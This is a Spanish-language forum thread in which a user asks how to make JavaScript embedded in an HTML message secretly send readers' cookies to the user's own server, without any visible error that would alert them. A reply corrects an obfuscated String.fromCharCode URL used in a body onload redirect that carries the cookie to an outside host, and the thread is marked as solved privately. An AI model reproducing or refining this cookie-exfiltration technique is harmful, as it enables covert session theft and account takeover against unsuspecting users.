-
A ver si alguien me puede echar un cable con un mini código que necesito para hacer un poco el gamberro (nada malo eh no os penséis xD) La cosa va de cookies, y necesito obtener el valor de una cookie almacenada localmente en un PC remoto a través de una petición a un servidor mío.
Es decir, el usuario leerá un mensaje en html que debe contener un código javascript que mande el valor de su cookie a mi servidor.
He logrado hacerlo pero no me sirve del todo ya que mientras lean el mensaje les saltará un error … la forma en que lo he hecho es simplemente:
Donde todo ese string no es más que la URL de mi servidor (pero si no se la paso así no funciona). El problema es que como ya he dicho, esa petición termina dando error (lógicamente), pero en mi log del servidor ya tengo el contenido de la cookie en forma de "www.servidor.com/?valor1=adasda&valor2=asdasd".
A alguien se le ocurre un método para hacer lo mismo pero sin que la carga de la página termine dando error ? Había pensando en usar una imagen un píxel por un píxel de color transparente, pero no se como se podría hacer... ya que el javascript no es lo mío.
Desde ahora, gracias
-
pues en la linea, tienes un espacio que es el que falla. Está en el segundo valor unicode, en el 1 16. Es el señalado con un $
String.fromCharCode(104,1**$**16,116,112,58,47,47,98,121,116,101,102,114,101,97, 107,115,46,99,111,109,63)
De todos modos, ese body onload=document.location=String.from . . . .. te puede dar lugar a errores.
No te gustaría mejor tenerlo de la forma -
Eso no me funciona. De todos modos si funcionara haría lo mismo que ya he logrado hacer, obtener la cookie pero haciendo que se de cuenta el usuario ya que le sale un error en el navegador con mi dirección metida arriba.
Lo que necesitaría (en caso de no lograrlo con una imagen) sería que al segundo (o menos) de hacer la petición a mi servidor la abortara. He probado con un abort(); pero no parece funcionar.PD: Te has dejado un espacio en el "121"
Edit: Resuelto por msn gracias a ninchi_punkrock